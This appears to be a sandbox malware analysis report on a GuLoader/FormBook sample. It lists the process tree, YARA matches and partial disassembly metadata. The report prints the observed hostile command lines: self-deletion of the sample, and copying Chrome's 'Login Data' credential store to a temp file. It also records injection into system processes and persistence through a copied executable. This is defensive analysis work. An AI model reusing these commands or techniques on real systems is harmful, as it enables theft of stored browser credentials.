                                                                                                                                                    Commandline:"C:\Users\user\Desktop\BL_CI_PL.exe"
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:143360 bytes
                                                                                                                                                    MD5 hash:75A9A6347C5AE5D8BD464C195B9802BB
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:Visual Basic
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.25496832496.0000000002B30000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                    Reputation:low

                                                                                                                                                    General

                                                                                                                                                    Start time:14:04:48
                                                                                                                                                    Start date:29/11/2021
                                                                                                                                                    Path:C:\Users\user\Desktop\BL_CI_PL.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Users\user\Desktop\BL_CI_PL.exe"
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:143360 bytes
                                                                                                                                                    MD5 hash:75A9A6347C5AE5D8BD464C195B9802BB
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000A.00000000.25494294503.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.26197526240.000000001E520000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.26197526240.000000001E520000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.26197526240.000000001E520000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.26187169960.00000000000A0000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.26187169960.00000000000A0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.26187169960.00000000000A0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    Reputation:low

                                                                                                                                                    General

                                                                                                                                                    Start time:14:05:26
                                                                                                                                                    Start date:29/11/2021
                                                                                                                                                    Path:C:\Windows\explorer.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                    Imagebase:0x7ff6269f0000
                                                                                                                                                    File size:4849904 bytes
                                                                                                                                                    MD5 hash:5EA66FF5AE5612F921BC9DA23BAC95F7
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000000.25948108416.000000001225A000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000000.25948108416.000000001225A000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000000.25948108416.000000001225A000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000000.26001641148.000000001225A000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000000.26001641148.000000001225A000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000000.26001641148.000000001225A000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    Reputation:moderate

                                                                                                                                                    General

                                                                                                                                                    Start time:14:05:58
                                                                                                                                                    Start date:29/11/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\ipconfig.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:C:\Windows\SysWOW64\ipconfig.exe
                                                                                                                                                    Imagebase:0x2e0000
                                                                                                                                                    File size:29184 bytes
                                                                                                                                                    MD5 hash:3A3B9A5E00EF6A3F83BF300E2B6B67BB
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000000E.00000002.30163222370.0000000003591000.00000004.00000020.sdmp, Author: Florian Roth
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.30162544062.00000000034A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.30162544062.00000000034A0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.30162544062.00000000034A0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000000E.00000002.30170515202.0000000003F37000.00000004.00020000.sdmp, Author: Florian Roth
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.30161003115.0000000002F20000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.30161003115.0000000002F20000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.30161003115.0000000002F20000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.30162209821.0000000003450000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.30162209821.0000000003450000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.30162209821.0000000003450000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    Reputation:low

                                                                                                                                                    General

                                                                                                                                                    Start time:14:05:59
                                                                                                                                                    Start date:29/11/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:/c del "C:\Users\user\Desktop\BL_CI_PL.exe"
                                                                                                                                                    Imagebase:0xff0000
                                                                                                                                                    File size:236544 bytes
                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:moderate

                                                                                                                                                    General

                                                                                                                                                    Start time:14:05:59
                                                                                                                                                    Start date:29/11/2021
                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    Imagebase:0x7ff7ac720000
                                                                                                                                                    File size:875008 bytes
                                                                                                                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:moderate

                                                                                                                                                    General

                                                                                                                                                    Start time:14:09:46
                                                                                                                                                    Start date:29/11/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:/c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
                                                                                                                                                    Imagebase:0xff0000
                                                                                                                                                    File size:236544 bytes
                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:moderate

                                                                                                                                                    General

                                                                                                                                                    Start time:14:09:46
                                                                                                                                                    Start date:29/11/2021
                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    Imagebase:0x7ff7ac720000
                                                                                                                                                    File size:875008 bytes
                                                                                                                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:moderate

                                                                                                                                                    General

                                                                                                                                                    Start time:14:09:47
                                                                                                                                                    Start date:29/11/2021
                                                                                                                                                    Path:C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:143360 bytes
                                                                                                                                                    MD5 hash:75A9A6347C5AE5D8BD464C195B9802BB
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:Visual Basic
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000017.00000002.28872866748.0000000002A70000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                    Reputation:low

                                                                                                                                                    General

                                                                                                                                                    Start time:14:09:47
                                                                                                                                                    Start date:29/11/2021
                                                                                                                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Program Files\Mozilla Firefox\Firefox.exe
                                                                                                                                                    Imagebase:0x7ff710730000
                                                                                                                                                    File size:597432 bytes
                                                                                                                                                    MD5 hash:FA9F4FC5D7ECAB5A20BF7A9D1251C851
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000018.00000000.28530443036.0000000022327000.00000004.00020000.sdmp, Author: Florian Roth
                                                                                                                                                    • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000018.00000002.28535963674.0000000022327000.00000004.00020000.sdmp, Author: Florian Roth
                                                                                                                                                    • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000018.00000000.28477585132.0000000022327000.00000004.00020000.sdmp, Author: Florian Roth
                                                                                                                                                    Reputation:moderate

                                                                                                                                                    General

                                                                                                                                                    Start time:14:09:56
                                                                                                                                                    Start date:29/11/2021
                                                                                                                                                    Path:C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe"
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:143360 bytes
                                                                                                                                                    MD5 hash:75A9A6347C5AE5D8BD464C195B9802BB
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:Visual Basic
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000019.00000002.28964217531.0000000002BC0000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                                                    General

                                                                                                                                                    Start time:14:10:26
                                                                                                                                                    Start date:29/11/2021
                                                                                                                                                    Path:C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:143360 bytes
                                                                                                                                                    MD5 hash:75A9A6347C5AE5D8BD464C195B9802BB
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001A.00000002.29297997278.0000000000060000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001A.00000002.29297997278.0000000000060000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001A.00000002.29297997278.0000000000060000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001A.00000002.29308978979.000000001E520000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001A.00000002.29308978979.000000001E520000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001A.00000002.29308978979.000000001E520000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000001A.00000000.28869456297.0000000000560000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                                                    General

                                                                                                                                                    Start time:14:10:35
                                                                                                                                                    Start date:29/11/2021
                                                                                                                                                    Path:C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe"
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:143360 bytes
                                                                                                                                                    MD5 hash:75A9A6347C5AE5D8BD464C195B9802BB
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000001B.00000000.28960622366.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001B.00000002.29462821134.000000001E520000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001B.00000002.29462821134.000000001E520000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001B.00000002.29462821134.000000001E520000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001B.00000002.29451748802.0000000000060000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001B.00000002.29451748802.0000000000060000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001B.00000002.29451748802.0000000000060000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com

                                                                                                                                                    General

                                                                                                                                                    Start time:14:11:06
                                                                                                                                                    Start date:29/11/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\NETSTAT.EXE
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:C:\Windows\SysWOW64\NETSTAT.EXE
                                                                                                                                                    Imagebase:0xcc0000
                                                                                                                                                    File size:32768 bytes
                                                                                                                                                    MD5 hash:9DB170ED520A6DD57B5AC92EC537368A
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001C.00000002.30158475772.0000000002D10000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001C.00000002.30158475772.0000000002D10000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001C.00000002.30158475772.0000000002D10000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000001C.00000002.30167876029.0000000003877000.00000004.00020000.sdmp, Author: Florian Roth
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001C.00000002.30159261353.0000000002D40000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001C.00000002.30159261353.0000000002D40000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001C.00000002.30159261353.0000000002D40000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001C.00000002.30154030326.00000000007D0000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001C.00000002.30154030326.00000000007D0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001C.00000002.30154030326.00000000007D0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000001C.00000002.30161247591.0000000002ED2000.00000004.00000020.sdmp, Author: Florian Roth

                                                                                                                                                    General

                                                                                                                                                    Start time:14:11:22
                                                                                                                                                    Start date:29/11/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                    Imagebase:0x7c0000
                                                                                                                                                    File size:147456 bytes
                                                                                                                                                    MD5 hash:4D780D8F77047EE1C65F747D9F63A1FE
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001D.00000002.30162719326.00000000046B0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001D.00000002.30162719326.00000000046B0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001D.00000002.30162719326.00000000046B0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000001D.00000002.30160230077.0000000002AC9000.00000004.00000020.sdmp, Author: Florian Roth
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001D.00000002.30162421459.0000000004680000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001D.00000002.30162421459.0000000004680000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001D.00000002.30162421459.0000000004680000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001D.00000002.30154231684.0000000000720000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001D.00000002.30154231684.0000000000720000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001D.00000002.30154231684.0000000000720000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000001D.00000002.30169443980.0000000004F37000.00000004.00020000.sdmp, Author: Florian Roth

                                                                                                                                                    General

                                                                                                                                                    Start time:14:11:34
                                                                                                                                                    Start date:29/11/2021
                                                                                                                                                    Path:C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe"
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:143360 bytes
                                                                                                                                                    MD5 hash:75A9A6347C5AE5D8BD464C195B9802BB
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:Visual Basic
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000001E.00000002.29975987031.0000000002C20000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                                                    General

                                                                                                                                                    Start time:14:11:42
                                                                                                                                                    Start date:29/11/2021
                                                                                                                                                    Path:C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe"
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:143360 bytes
                                                                                                                                                    MD5 hash:75A9A6347C5AE5D8BD464C195B9802BB
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:Visual Basic
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000001F.00000002.30058808750.0000000002380000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                                                    General

                                                                                                                                                    Start time:14:12:16
                                                                                                                                                    Start date:29/11/2021
                                                                                                                                                    Path:C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe"
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:143360 bytes
                                                                                                                                                    MD5 hash:75A9A6347C5AE5D8BD464C195B9802BB
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000020.00000002.30154748780.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000020.00000000.29972117697.0000000000560000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                                                    General

                                                                                                                                                    Start time:14:12:24
                                                                                                                                                    Start date:29/11/2021
                                                                                                                                                    Path:C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe"
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:143360 bytes
                                                                                                                                                    MD5 hash:75A9A6347C5AE5D8BD464C195B9802BB
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000021.00000000.30054816737.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000021.00000002.30154741238.0000000000560000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                                                    Disassembly

                                                                                                                                                    Code Analysis

                                                                                                                                                      Execution Graph

                                                                                                                                                      Execution Coverage:8.8%
                                                                                                                                                      Dynamic/Decrypted Code Coverage:30.5%
                                                                                                                                                      Signature Coverage:6.9%
                                                                                                                                                      Total number of Nodes:394
                                                                                                                                                      Total number of Limit Nodes:15

                                                                                                                                                      Graph

                                                                                                                                                      Executed Functions

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 53 2b3fae6-2b3fb16
                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryA.KERNELBASE(1B54ED57), ref: 02B3F8BC
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.25496832496.0000000002B30000.00000040.00000001.sdmp, Offset: 02B30000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2b30000_BL_CI_PL.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: LibraryLoad
                                                                                                                                                      • String ID: wEj
                                                                                                                                                      • API String ID: 1029625771-1518881957
                                                                                                                                                      • Opcode ID: 79d5da4b2b0fe70a851aaafd7e00bc9962a1e194395f7ca7e8bd450ee45efaf8
                                                                                                                                                      • Instruction ID: 94fdfe8e9c27443ee72308901797c209ba4ad4d99c000534f351778fd4b803e6
                                                                                                                                                      • Opcode Fuzzy Hash: 79d5da4b2b0fe70a851aaafd7e00bc9962a1e194395f7ca7e8bd450ee45efaf8
                                                                                                                                                      • Instruction Fuzzy Hash: D8612B75B4138A5FEF359D748DA43FA36535F633A0FA8426ECC864B284DB358985CB01
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 140 2b42897-2b42955 NtProtectVirtualMemory
                                                                                                                                                      APIs
                                                                                                                                                      • NtProtectVirtualMemory.NTDLL ref: 02B42953
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.25496832496.0000000002B30000.00000040.00000001.sdmp, Offset: 02B30000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2b30000_BL_CI_PL.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MemoryProtectVirtual
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2706961497-0
                                                                                                                                                      • Opcode ID: 6f349eab1bd50ee41d0713d4066b3ebe85f2ee296e5245aba208eaf3b4163246
                                                                                                                                                      • Instruction ID: 7754cd14195b7f749237db44177a12d1bbfe366e29564febc218dff49e4ab621
                                                                                                                                                      • Opcode Fuzzy Hash: 6f349eab1bd50ee41d0713d4066b3ebe85f2ee296e5245aba208eaf3b4163246
                                                                                                                                                      • Instruction Fuzzy Hash: 660169B02482459FEB28DE28DD487EAB7E7AFD4300F45842DAC899B204CB70AE45CA15
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 0 41c620-41c6ea
                                                                                                                                                      APIs
